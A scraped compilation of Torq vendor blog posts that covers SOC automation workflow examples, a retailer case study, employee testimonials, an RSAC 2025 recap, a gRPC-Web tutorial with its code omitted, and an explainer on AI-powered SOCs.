Compare new IOCs with existing case observables and identify unique ones.
Trigger a secondary nested workflow to check observables with threat intelligence (Workflow: Parallel execution — VirusTotal, Recorded Future, AlienVault).
Revoke the CrowdStrike session token and exit.

3. Automated Alert Enrichment

Aggregate endpoint information from SentinelOne, Axonius, and Azure AD to enrich security data and support threat intelligence efforts.

Workflow Steps:

Execute parallel processes to gather endpoint details from multiple sources.
Retrieve agent details from SentinelOne using an API call with specified parameters.
Extract key information from SentinelOne data using a JSON query.
Fetch device details from Axonius with a POST request and process the response to extract relevant attributes.
Generate an access token for Microsoft 365 and retrieve device information from Azure AD based on display name.
Compile the gathered data from SentinelOne, Axonius, and Azure AD using AI Task Agent to create a formatted summary of results.

4. Identity Access Request Management

Automate the process of requesting, approving, and granting temporary admin rights to Mac users across different store locations, ensuring compliance and proper authorization.

Workflow Steps:

Search for a Slack user’s email address based on the provided username.
If the email is found, prompt the user to provide a reason for requesting temporary admin rights on their Mac.
Depending on the user’s response, either proceed to find computers and store locations associated with the user’s email, or end the request.
If approved computers are found at the current location, ask the user to select which Mac they need admin rights on.
Request IT approval for granting admin rights.
If approved, temporarily grant admin rights on the selected Mac and notify the user.
After 15 minutes, revoke the admin rights and notify the user of the expiration.
If not approved, notify the user about the denial.

5. Daily Health Check

Automate the monitoring and management of security cases and detections, integrating with CrowdStrike and Microsoft Teams for comprehensive incident handling and communication.

Workflow Steps:

Query Crowdstrike events for specific states and severities, starting a custom SLA timer for each based on severity.
Retrieve the current date from each event; check if it is Monday, Wednesday, or Friday to proceed with further actions.
Search for unassigned detections and incidents older than specified hours/days.
Filter and process detection and incident data, collecting details for each unassigned detection and incident.
Summarize findings and send to Microsoft Teams.

Case Study: Fast Fashion Retailer Enhances SOC Efficiency with Hyperautomation

One of the world’s largest fast-fashion retailers was struggling under the weight of manual processes, siloed tools, and a legacy SOAR platform. With thousands of alerts coming in every day, their team was spending most of their time chasing false positives and combing through disjointed systems, leaving little time for meaningful response and strategy.

The retailer turned to Torq Hyperautomation to modernize their cybersecurity processes. With Torq’s intuitive workflow builder, analysts at all skill levels could build automations in minutes. Torq’s case management system and integrations with the team’s existing security solutions streamlined alert enrichment, triage, and response. They were also able to automate their just-in-time access across OS systems, cloud, and hybrid environments, ensuring a streamlined process for administrative workflows.

The retailer now solves end-user tickets in minutes and automates admin access across globally distributed teams. Read the full case study for more.

Get the Case Study

First, They Killed Their SOAR. Then They Joined Torq.

By Torq

May 7, 2025

6 Minute Read

Before Torq, they were trapped. Buried under alerts. Drowning in old playbooks. Burned out by legacy SOAR tools that promised automation and delivered chaos. Then they discovered Torq, not just as a solution, but as a better way to work. They became power users, rebuilt their workflows, and transformed their SOCs.

Now? They’re former legacy SOAR users — thriving with the ultimate SOAR replacement: Torq.

Meet the team. Hear their stories. And see why switching to Torq wasn’t just the best move they made for their SOC; it was the best move they made for their careers.

Meet the Team That Escaped SOAR Hell

Patrick “PO” Orzechowski
Field CISO

PO is Torq’s Field CISO, bringing his years of experience and expertise as a SOC leader to our customers. PO is a seasoned security veteran with a deep understanding of the modern security landscape. You can find him talking to SOC leaders and CISOs from major brands at cybersecurity events worldwide.

Superpower: Connecting across teams, balancing priorities, and helping people align on what matters.

João Ceron
Solution Architect

João is a Solutions Architect at Torq with 15+ years in SOC and network security. He holds a PhD with research on DDoS and IoT security, has published at USENIX Security, and contributed to projects for the Dutch government and U.S. DHS. At Torq, he helps clients implement AI-driven SOC automation.

Superpower: Processing massive amounts of data and turning it into actionable value.

Rich Chen
Sales Engineer

To borrow a line from Wayne’s World, Rich’s career could be summed up as “an extensive collection of name tags and hairnets.” Over nearly 20 years, he’s done it all — teacher, helpdesk, sysadmin, VMware wizard, cybersecurity engineer, and manager. Rich brings deep technical knowledge and a teaching mindset to every customer conversation as Sales Engineer at Torq.

Superpower: Teaching. Whether it’s a teammate or a customer, Rich is always teaching at Torq.

Kyle Dalton
Director, Solutions Architecture

Kyle is the Global Head of Solution Architecture at Torq, where he helps organizations reimagine the modern SOC through security Hyperautomation and agentic AI. A former analyst and engineer with deep hands-on experience, Kyle spent years in the trenches. Today, he brings that frontline perspective to help security teams operationalize response, eliminate burnout, and amplify human impact with Torq HyperSOC™.

Superpower: Listening and turning real-world pain points into better solutions.

Why They Replaced SOAR with Torq

Partnership: “The level of attention and partnership from Torq was unlike anything else. Every meeting and interaction was consistently positive. And it wasn’t just about features — it was about the willingness to build what we needed.” – Patrick Orzechowski

Intuitive user interface: “We were looking at a few vendors. Torq had the most intuitive UI, the best pricing model, and a clear commitment to delivering case management features we needed.” – João Ceron

Built for analysts: “I needed something my analysts could actually use. With Torq, everything just made sense. But honestly, it was the team that sold me. It felt like a true partnership.” – Rich Chen

Pride in every detail: “I could feel the pride that the team takes in the product, and that was huge for me. The team was really committed to the partnership.” – Kyle Dalton

Compare AI-driven Hyperautomation to legacy SOAR >

The Problems Legacy SOAR Couldn’t Solve — But Torq Did

Before joining Torq, Patrick’s team bought into the SOAR promise — that it would automate everything, integrate with everything, and even replace analysts. Instead, it became a scalability nightmare. The platform was slow, clunky, expensive to maintain, and unusable for entry-level analysts. With Torq, everything changed. It was fast, intuitive, and actually usable from day one.

Kyle shared a similar experience. 30% of his team’s time was spent managing an on-prem SOAR implementation. It wasn’t event-driven, which made scaling painful. With Hyperautomation as their SOAR replacement, they quickly expanded integrations and were able to rebuild complex workflows in just hours instead of weeks.

“We were burning 30% of our team’s capacity just managing an on-prem SOAR. That’s how we knew we needed something to replace SOAR. Shifting to Hyperautomation completely changed everything — we dramatically expanded integrations and met customers where they are. What really sealed it was rebuilding a workflow that used to take a week and a half… in under four hours.”

– Kyle Dalton, former legacy SOAR user

Rich brought receipts on how Torq made a massive difference outside traditional SecOps. His team was bogged down by daily manual processes, pulling data from multiple platforms, transforming CSVs, and uploading them all again. Torq eliminated that friction, automating workflows across security and IT operations.

João pointed to a major shift in team autonomy. Before Torq, every automation request had to go through engineering. With a modern SOAR replacement, his team could build what they needed on their own: faster processes, better data correlation, and complete control over their workflows.

Learn how to make the switch like PO, João, Rich, and Kyle did.

Get the SOAR Migration Guide

Favorite Features and Go-To Tools

When asked which Torq features sealed the deal, each team member had a clear favorite — and a very good reason why.

PO pointed to case routing: “When you manage thousands of cases and a hundred analysts, things get missed. Torq’s case management made things manageable and improved the analyst experience overall.” Case management and Socrates, the AI SOC analyst, remain his go-to zones in the platform.

João loves the Collect operator: “It made my life so much easier.” Collect streamlines data gathering, making it simpler to manage and reference results across complex workflows. You’ll usually find him deep in workflow builds and data transformation.

Rich is all about nested workflows: Reusable, modular automation that keeps things clean and scalable. He spends his time on Canvas, where he builds POCs and custom demos.

Kyle highlighted Torq’s ability to convert any step to HTTP as a game-changer: “Way less overhead than scripting in legacy tools.” Lately, he’s been spending time exploring Interact workflows and pushing new features to the edge.

Life at Torq: What Surprised Them Most

One of the biggest surprises for PO, Joao, Rich, and Kyle after joining Torq was how closely the internal culture mirrored the customer experience. PO noted how refreshing it was to see the same positivity and partnership behind the scenes that he had experienced as a customer.

João was surprised by how much customer feedback directly influences the roadmap, realizing that Torq isn’t just listening, it’s actively building with its users. Rich was blown away by the pace of innovation, sharing how HyperSOC launched and then evolved rapidly within weeks. For Kyle, he knew he was boarding a rocket ship — but didn’t expect it to be going that fast.

“The pace of innovation at Torq is insane. HyperSOC came out — and within weeks, even more functionality was being rolled out.”

– Rich Chen, Sales Engineer, Torq

Want to join the team that killed SOAR?

Explore Torq Careers

Torq Drops Jaws at RSAC 2025

By Britt Wittfeldt

May 5, 2025

5 Minute Read

Torq roared into RSAC 2025 in our usual style: all gas, no brakes. Our team traveled in from around the world to set up an unmissable, unforgettable booth featuring Grave Digger that instantly became the talk of the show. (We also unleashed our Junior Media Intern, Trevor, on San Francisco, for which we apologize). But the real game-changer was our unveiling of new agentic AI innovations in Torq HyperSOC™ — with the demo that set RSAC on fire.

Here are all the best moments.

Torq Steals the Pre-Show Spotlight

In the lead-up to RSAC, Torq announced the acquisition of stealth Israeli startup Revrod, whose multi-agent RAG (Retrieval-Augmented Generation) advancements are now incorporated into HyperSOC™. This latest release makes HyperSOC-2o our most autonomous model to date and the first truly agentic SecOps platform.

This was followed by the announcement of another Torq “first” for autonomous security operations: becoming the first platform to support a Model-Context Protocol (MCP) natively in its architecture.

Torq was also featured in the latest “new and notable” Microsoft Sentinel integrations ahead of RSAC. Rounding out the pre-conference press blitz, Forbes published an article detailing how Torq stands out in cybersecurity thanks to “bold branding and a fearless aesthetic… bringing edge, energy and authenticity to an industry known for playing it safe.”

“What really sets Torq apart is its effort to blend cultural relevance and brand identity with technical innovation.”

– Tony Bradley, Senior Contributor, Forbes

The RSAC Booth Sensation: “Just, Wow.”

Yes, we really put all 12,000 pounds of the iconic Grave Digger monster truck in our booth. LinkedIn post after LinkedIn post declared it “the best booth at RSAC,” and the hype was electric.

Forbes hailed the Torq booth’s visual elements as “more reminiscent of streetwear brands and music festivals than typical enterprise security vendors.” Security Weekly said that Torq “pulled out ALL THE STOPS MONSTER TRUCK LASER SKULLS F*&CK YEAH, that’s how you do it!” Chainsaw through the noise? Check.

The Demo That Set RSAC on Fire

While Grave Digger drew people in, it was Torq’s technology that kept hundreds of security pros around our booth for demo after demo.

Leading up to RSAC, HyperSOC’s agentic AI innovation was validated by industry analysts, with IDC’s new report stating: “Torq is working on all SOC fronts while improving MTTD, MTTR, threat hunting, and remediation actions impactfully. The agentic AI architecture is disruptive.”

We also got a shout-out ahead of RSAC from Cyber Research Analyst Francis Odum, who stated: “Torq HyperSOC makes the potential of AI in a SOC attainable and sustainable by connecting AI with the SOC’s full range of tools and processes. Torq HyperSOC is a huge game-changer for enterprises.”

To top it all off, mid-conference, Torq won the 2025 SC Media Award for Best Emerging Tech by SC Media for our platform’s agentic AI capabilities, which were described as “the forefront of next-gen security automation.”

“Everyone says ‘agentic AI,’ but that’s the first demo I’ve seen actually working live.”
– Heard at RSAC

Beyond the Moscone Center

On the first night of the conference, two of Torq’s co-founders — CTO Leonid Belkind and CINO Eldad Livni — hosted an exclusive Founders’ Dinner at Michelin-star restaurant Boulevard with CISOs and security leaders from major brands around the globe.

Moving into day three of RSAC, Torq CMO Don Jeter sat down with George Kamide and George Al-Koura from the Bare Knuckles & Brass Tacks podcast to talk through how Torq’s marketing blew up from a small 10×10 booth RSAC just a few years ago to this year’s monster display. When the Georges asked how Torq built such “a fundamentally cool brand”, Don shared that it all started with the fierce belief that SOAR is dead and then telling that story boldly — which hit a community nerve to create “something that people want to be a part of.”

Watch the episode here >

“Tech is lame. Torq is cool.”

– George A., Bare Knuckles & Brass Tacks podcast

Unleashing the Most Feral Channel Program in Cybersecurity

During the conference, Sheldon Muir, Torq’s AVP of Global Channels, spoke with MSSP Alert about how our disruptive partner program prioritizes customer outcomes — driving results, incentives, and value for our partners. More on this coming soon!

“Great tech — which I obviously believe Torq has — has to be met by great marketing. And the third leg of the stool is you gotta have something disruptive on the channel side.”

– Sheldon Muir, AVP of Global Channels, Torq

On to the Next

Thousands of steps logged, energy drinks downed, and Bone Bucks handed out later, the Torq team said goodbye to the Moscone Center, but that’s not the end of the road for Torq + Grave Digger. Torq has partnered with Monster Jam® for a 6-city tour this summer. Find your city and save your seat here.

Want to see the HyperSOC demo that set RSAC on fire? Request a demo.

Get a Demo

gRPC-web: Using gRPC in Your Front-End Application

By Konstantin Ostrovsky

May 1, 2025

7 Minute Read

At Torq, the AI-native autonomous SOC and security Hyperautomation leader, we use gRPC as our one and only synchronous communication protocol. Internally, microservices communicate with each other using gRPC. Externally, our frontend application uses gRPC-Web to communicate with the backend APIs via an API Gateway.

While gRPC offers many benefits, its adoption in frontend development lags behind REST API and GraphQL. This disparity can pose challenges for front-end developers accustomed to using the built-in Chrome Network Inspector for traffic analysis.

Originally published over three years ago, this blog post now addresses the introduction of ConnectRPC, a new protocol for frontend-to-backend communication via gRPC. ConnectRPC resolves certain limitations of gRPC-Web and offers enhanced code generators for TypeScript and JavaScript.

Importantly, adopting these new generators does not necessitate a complete switch of transport protocols, as the generated client and server code provide support for both gRPC-Web and the newer ConnectRPC protocol. We switched to using those code generators at Torq and are extremely pleased with the improved developer experience.

This article explains how to enable communication between a frontend application and a gRPC backend using the gRPC-Web protocol, demonstrated by leveraging the connect-es proto plugin generated for the client.

What is gRPC-Web?

gRPC-Web is a JavaScript client library that enables web applications to directly communicate with gRPC services. It allows browser-based applications to leverage the benefits of gRPC’s efficient protocol buffers serialization, bidirectional streaming, and HTTP/2-based transport, despite browsers not fully supporting HTTP/2 bidirectional streaming. gRPC-Web implements a compatibility layer that translates between browser HTTP/1.1 requests and gRPC’s HTTP/2 protocol.

Backed by the CNCF community, gRPC stands out as a popular and active project. It offers official support for over ten programming languages and well-defined best practices, making it an excellent option for API development. These characteristics aligned perfectly with Torq’s needs when selecting an API protocol.

gRPC offers a straightforward approach to service definition. Developers define services and methods using proto files. Subsequently, the proto compiler facilitates the generation of server and client interfaces compatible with various programming languages. This includes TypeScript and Go, the primary languages employed internally at Torq.

From a technical perspective, gRPC-Web requires a proxy (like Envoy or Caddy) that sits between the web client and the gRPC server to handle protocol translation. The client generates JavaScript code from the same .proto service definitions used by the backend, but uses a slightly different wire format and doesn’t support all gRPC features (like full bidirectional streaming). It supports both binary protobuf and JSON serialization formats, and can work with modern frontend frameworks like React, Angular, and Vue.

What is ConnectRPC?

Connect is a suite of libraries designed to create APIs compatible with both browsers and gRPC. It offers a JSON-based protocol as an alternative to native gRPC, supporting features like streaming, trailers, and error details.

The ConnectRPC project launched a new protocol along with multiple proto-compilers for major programming languages. The resulting code is not only compatible with this new protocol but also maintains full interoperability with existing gRPC and gRPC-Web implementations.

Connect-es, its proto compiler, produces high-quality code, offering frontend developers an excellent experience through language-native gRPC interfaces both in the backend and the browser.

ConnectRPC introduces a JSON-based text protocol over HTTP, addressing gRPC challenges such as caching.

A Quick Overview of Our Architecture

We use a microservice architecture at Torq. Our backend APIs are accessible by an API Gateway (Backend for Frontend), which is built in Go and provides services such as:

Smart routing to internal services
Aggregator pattern that allows combining data coming from multiple internal services into a single response
gRPC-Gateway proxy, which we use to allow REST API access to our public APIs
gRPC-Web proxy that translates requests coming from the frontend application using the grpc-web protocol to gRPC requests.

Our application utilizes an API Gateway as the sole entry point for all external traffic. This gateway centralizes API access and comprises a collection of gRPC services. The continuous integration (CI) process for the API Gateway repository includes the automatic generation of TypeScript client libraries.

Building gRPC-Web Clients Using Connect-es Plugin

As mentioned above, at Torq, we generate TypeScript clients for all our external APIs as part of our CI (GitHub Actions) continuous integration build process, which is a component of the API Gateway service.

We previously used a bash script for pre-installing proto compiler plugins and running the protoc command. Over the last two years, we transitioned to the Buf CLI tool, which has streamlined the process. Buf allows us to define proto-generation rules in a single YAML file, eliminating the need for local protoc plugin installations.

For our gRPC-Web client, we utilize the Connect-es protoc plugin to generate TypeScript files. These files are then packaged as an npm package and published to the GitHub package repository. Our frontend applications integrate this package using the standard `npm install` command.

Go Server, VueJS, and gRPC-Web client example

Below is the gRPC service definition:

This gRPC service defines a simple TimeService. It provides a method for getting the current time via the GetCurrentTime rpc method. The time is returned in the ISO 8601 format.

Generating Clients and Servers

To generate client and server code from the proto file, we will utilize the Buf CLI tool. While the `protoc` compiler could also be used, Buf CLI streamlines this process by reducing friction. We will employ the Go and TypeScript proto-compilers to generate code for these specific languages.

To generate the code, we will use the following `buf.gen.yaml` file:

The generated files for go will be placed under ./time/goclient and the JavaScript ones will be in /frontend-ts/src/jsclient.

gRPC in the Backend

Our backend is a very basic Go server implementation. We spin up the gRPC server listening on 0.0.0.0:8080. It implements the TimeServiceServer interface and returns time.Now().Format(time.RFC3339) for each request

gRPC in the Frontend

Using the Connect-ES library, calling gRPC-Web endpoints is straightforward. Simply initialize the client with the gRPC-Web server address and then invoke its methods.

For easier debugging of gRPC web traffic in your browser, consider installing the gRPC-Web Devtools Chrome extension. This tool provides an inspection capability similar to Chrome’s built-in Network Activity Inspector.

Envoy Configuration

gRPC-Web requires a proxy for gRPC translation. Envoy offers built-in support, as demonstrated by the provided configuration. A frequent issue is CORS configuration. The example below shows a permissive wildcard domain setting, which is not recommended for production. However, it can be adapted for specific production needs with minor adjustments.

A Five Year Perspective on gRPC-Web

This blog post aims to provide an accessible introduction to gRPC-Web, a valuable technology for those already invested in gRPC. Since the original publication, the gRPC-Web ecosystem has matured considerably with the introduction of powerful tools. Notably, the Buf CLI has streamlined the command-line interface and configuration for compiling proto files into client and server-side code. Furthermore, the Connect-ES proto compiler plugin enhances the development experience by generating more natural and intuitive client-side code.

Our team has leveraged gRPC-Web for five years, appreciating the advancements in tooling that have emerged during this time. For further exploration, the source code referenced in this article is accessible here.

Want to learn more about Torq? Watch our 4-minute video to see how Torq’s AI–driven Hyperautomation platform helps security teams automate more, faster.

Watch Now

AI SOC, Explained: How AI-Powered SOCs Transform SecOps

By Torq

April 29, 2025

9 Minute Read

Security Operations Centers (SOCs) are the command center of an organization’s frontline cybersecurity defenses — responsible for monitoring threats, prioritizing alerts, and orchestrating remediation. However, today’s SOCs are facing an existential crisis: an overwhelming volume of increasingly complex and sophisticated threats combined with a shortage of skilled analysts. This perfect storm is pushing SOCs to their breaking point, burning out their teams and leaving their organizations vulnerable.

Legacy security automation solutions struggled to keep up with the evolving threat landscape, especially at scale. The rise of artificial intelligence (AI) has been hailed as a game-changer for SOCs, offering the potential for unprecedented efficiency gains.

But what does effective use of AI in the SOC look like? Below, we show top use cases for leveraging AI in the SOC and explore how AI is transforming security operations.

What is an AI SOC?

An AI-powered SOC is a security operations center that leverages artificial intelligence to automate processes, enhance threat detection, accelerate incident response, provide contextual insights, and optimize resource allocation — resulting in greater efficiency and accuracy, improved decision-making, faster time to remediation, and a more proactive security posture.

The Technical Foundations of an AI-Powered SOC

Security automation has evolved way past SOAR — with Hyperautomation and AI Agents forming the new cornerstones of the modern autonomous SOC.

AI-driven Hyperautomation: By seamlessly integrating your security stack and instantly automating any security process using thousands of pre-built integration steps and AI-generated workflows, Hyperautomation offloads routine tasks, reduces analyst burnout, and accelerates threat response.
Multi-Agent System: Specialized AI Agents automate incident response by interpreting natural language instructions and collaborating to autonomously execute tasks such as alert triage, containment, and remediation actions. Human analysts can interface with the AI agents using natural language for accelerated enrichment, investigation, and recommended next steps.

What’s the Difference? All the AI in the SOC, Explained

This new landscape of AI in the SOC comes with a LOT of similar-but-different terminology. GenAI, AI Agents, OmniAgents, agentic AI, multi-agent systems — we get it, it can be confusing.
Here’s a breakdown of all the AI powering modern security operations, what each one does, and how Torq HyperSOC™ puts them all to work.

Term	Definition	What It Does	How Torq HyperSOC™ Uses It
GenAI	GenAI creates content, code, text, images, or predictions in response to natural language prompts	Enhances SOC operations with automated case summaries, enrichment, and workflow generation	Drafts incident summaries, generates workflow templates, and speeds up case documentation
Agentic AI	Agentic AI is autonomous, goal-driven AI that plans, adapts, and executes multi-step security workflows across time and tools	Powers AI agents with autonomy and adaptability to handle tasks like detection, triage, and response in real-time	Socrates, the AI SOC Analyst, coordinates and makes workflow decisions autonomously without human-triggered actions
AI Agent	An AI Agent is a single AI entity that independently handles a specialized task	Performs specific security tasks such as isolating endpoints, locking accounts, or enriching threat intelligence based on predefined triggers	Powers single-task automations: pulling threat intel, scanning suspicious emails, updating ServiceNow or Jira tickets
Multi-Agent System (MAS)	A Multi-Agent System is composed of multiple autonomous AI agents that collaborate to achieve complex goals	Deploys specialized AI agents in parallel across the SOC to handle triage, investigation, containment, and case management	MAS architecture: Runbook Agent, Investigation Agent, Remediation Agent, and Case Management Agent, all coordinated by Socrates
OmniAgent	An OmniAgent acts as a “Super Agent” orchestrating the activities and interactions between specialized AI Agents in a MAS	Uses sophisticated iterative planning and reasoning to solve complex, multi-step problems autonomously through the coordination of multiple AI Agents	Socrates identifies prioritizes, and remediates threats across the entire organization by controlling and coordinating the Runbook, Investigation, Remediation, and Case Management Agents

Top Use Cases for AI in the SOC

By analyzing vast amounts of data from across your security stack and executing intelligent automations, AI unlocks efficiency gains across SOC functionalities such as:

Incident investigation: Analyze massive volumes of alerts to identify patterns, suppress low-fidelity alerts, and automate triage and validation, accelerating the investigation process from start to resolution.
Case management: Streamline the process of prioritizing, tracking, and managing security incidents by intelligently enriching and automating cases.
Workflow generation: Prompt AI with a natural language description of your use case to instantly build security automation workflows — no code required.
Case summarization: Analyze all relevant data points associated with a security alert to provide easy-to-digest, evidence-backed summaries of complex security cases, improving SOC analysts’ efficiency and collaboration.
Documentation: Automatically generate documentation for complex automated processes, increasing both efficiency and accuracy from shift-handovers to compliance audits.
Executive reporting: Prompt the system to generate case info in the right tone and level of information for a specific persona, such as for a non-technical executive or board member.
Team collaboration: Automatically alert Slack or Teams channels when a case is created, escalated, resolved and more.
Resource optimization: Use AI to assign cases to an available analyst based on workload and shift schedules.

Data correlation: Combine and correlate data from all of the tools in your security stack, providing a holistic view of your security environment.
Threat response: Automate tasks like threat detection and containment for faster incident resolution.

How Do AI-Powered SOCs Transform Traditional Security Operations?

Scaling SOC operations: AI agents can handle an influx of security events: triaging, investigating, and remediating the majority of Tier-1 and Tier-2 alerts. This frees up analyst bandwidth to focus on urgent incidents and strategic projects, enabling SOCs to efficiently scale their operations without increasing headcount (which is vital amidst today’s shortage of skilled cybersecurity talent).

Shifting to a proactive security posture: Agentic AI goes beyond just detecting and counteracting attacks by applying real-time intelligence to identify patterns and detect emerging threats. This allows SOCs to adopt a less reactive, more preemptive approach to address vulnerabilities before they can be exploited or breached.

Reducing alert fatigue and analyst burnout: By autonomously triaging alerts and reducing false positives, AI agents reduce the number of irrelevant alerts that analysts must wade through. And, by automating tedious, repetitive tasks and auto-remediating most low-level alerts, AI-driven Hyperautomation helps senior analysts gain back the time and capacity to focus on more rewarding work like strategic projects.

Speeding up MTTR: All of the efficiency gains from leveraging AI in the SOC translates to more alerts resolved, faster.

Will AI Replace Humans in the SOC?

Adopting AI in the SOC is not about replacing human SOC analysts — it’s about augmenting and empowering them. With a looming 4 million+ cybersecurity talent shortage, organizations must not only retain their existing analysts, but also help them work more efficiently. On top of that, organizations are recognizing that human-only defenses are inadequate to counter the evasive and persistent threats posed by AI-driven attacks.

AI reduces analyst burnout: A multi-agent system can reduce the strain on SOC teams by offloading rote tasks, auto-remediating the majority of Tier 1 tickets, and upleveling the skills of junior analysts. This frees up senior analysts to focus their expertise on critical threats and strategic projects, helping their organization achieve a stronger overall security posture.

Human expertise must remain the final line of defense: Done the right way, AI-powered SOCs keep humans “in the loop” as the ultimate decision-makers for high-stakes threats following rigorous, multi-tiered AI evaluation and case enrichment that helps human analysts take informed, decisive action.

“By 2028, multiagent AI in threat detection and incident response will rise from 5% to 70% of AI implementations to primarily augment — not replace — staff..”
Source: Gartner Inc.

How Torq’s AI Capabilities Supercharge SecOps

Torq has been very deliberate in how we’ve extended the capabilities of the Torq platform using AI to solve real problems for SOCs with products and features like:

Socrates, the OmniAgent AI SOC Analyst: Socrates intelligently automates alert triage, incident investigation, and response, extending your SOC teams’ capabilities and improving response times across the board. Socrates coordinates a full Multi-Agent System (MAS) — planning, investigating, remediating, and managing security cases with human-like decision-making and machine-speed execution.

Socrates can auto-remediate 95% of cases within minutes. For critical cases that require human intervention, your analysts can collaborate with Socrates using natural language to summarize case details, enrich cases with additional investigation and threat intelligence, and trigger remediation workflows
AI Workflow Builder: Simply describe your desired security automation workflow in natural language, and Torq’s AI Workflow Builder will generate a tailored solution in seconds. Rather than spending hours manually building workflows from scratch, your team is freed up to focus on more strategic security initiatives.
AI Case Summaries: Help your team make the right decisions quickly by presenting them with a concise, insightful, and verifiable AI-generated summary of each case. No more wading through pages of logs and incident details! The easy-to-read summaries empower SOC teams to work faster, make informed decisions with confidence, and seamlessly transition between shifts by giving the incoming team clear case context backed by citations.
AI Data Transformation: Simplify complex data manipulation for security operations by easily transforming complex JSON data using natural language — no coding required. Each transformation is broken down into precise, testable micro-transformations that users can edit, validate, and modify individually.
Runbook Execution: Intelligently plan customized investigation and response strategies based on the organization’s historical outcomes and adapt to new threat vectors, ensuring faster containment.
Deep Research Investigations: Uncover hidden attack patterns across disparate data sources, perform detailed root cause analyses, and dynamically assess threat impact — giving SOC teams context previously out of reach without hours of manual digging.

Torq now has multi-agent RAG (Retrieval-Augmented Generation) incorporated into HyperSOC™ which has supercharged its ability to do deep research, analyze threats, and coordinate responses at machine speed — and is the first autonomous security platform to support a Model-Context Protocol (MCP) natively in its architecture. These advancements make our latest HyperSOC release our most autonomous model to date and the first truly agentic SecOps platform.

The Future of the SOC: Better, Faster Human Decision-Making Through AI Automation and Insights

When deployed effectively, AI in the SOC extends and enhances the capabilities of your existing staff so they can make better decisions faster.

So, what does the future of SOC automation look like? Sophisticated multi-agent AI continuously learns from historical data and real-time incidents to generate insights and recommendations, automate routine security tasks, and auto-remediate the majority of alerts, with a top layer of human analysts providing strategic oversight for critical cases. This means faster, more proactive responses to threats and vulnerabilities — and a more secure future for organizations everywhere.

Want to learn how to deploy AI in the SOC the right way? Read the AI or Die Manifesto to learn CISO considerations, fake AI red flags, and evaluation questions.

Get the Manifesto

Contents

What Is SecOps Automation?

Traditional SecOps Is Broken

Why Lean Teams Need SecOps Automation

Five Ways Automated SecOps Helps Level the Playing Field

1. Phishing

2. Threat Intelligence Enrichment

3. Incident Response

4. Vulnerability Management (VM)

5. Identity and Access Management (IAM)

SecOps Automation = Big Results for Lean Teams

Torq: The Leading Platform for SecOps Automation

What SecOps Automation Looks Like

Check Point

Global Retailer

Lennar

Scale Your Security Without Scaling Your Team

Related Articles

The AI SOC Analyst That Offloads 90%+ of Tier-1 Cases — Meet Socrates

The Multi-Agent System: A New Era for SecOps

Three SOC Threats Solved in Minutes with Torq Hyperautomation

Contents

Why the SOC Needs an AI Analyst

What is an AI SOC Analyst?

What Is Torq Socrates?

The Anatomy of Socrates: Torq’s OmniAgent

How an AI SOC Analyst Performs Tier-1 Tasks

1. Automatic Runbook Analysis

2. Deep Research Incident Investigations

3. Knowledge of Security Frameworks for Context

4. Leveraging Hyperautomation to Perform Designated Remediation Actions

5. Intelligent Case Management and Documentation

How Security Teams Use Socrates Today

Related Articles

The AI or Die Manifesto

AI in SOC Operations: 3 Use Cases That Show How Socrates Supercharges Analysts

AI SOC, Explained: How AI-Powered SOCs Transform SecOps

Contents

What Is a Multi-Agent System?

Multi-Agent System Defined

Why Multi-Agent AI Outperforms Single AI Agents

How Do Multi-Agent AI Systems Work in the SOC?

Multi-Agent System Use Cases In the SOC

Alert Triage at Scale

Runbook Orchestration

Incident Response

Threat Hunting

The World’s First Multi-Agent System for The SOC

Socrates, the AI SOC Analyst

Runbook Agent

Investigation Agent

Remediation Agent

Case Management Agent

The Future of SecOps: The Autonomous SOC Powered by Multi-Agent AI

Quiz: Which Torq AI SOC Agent Has Your Back?

Related Articles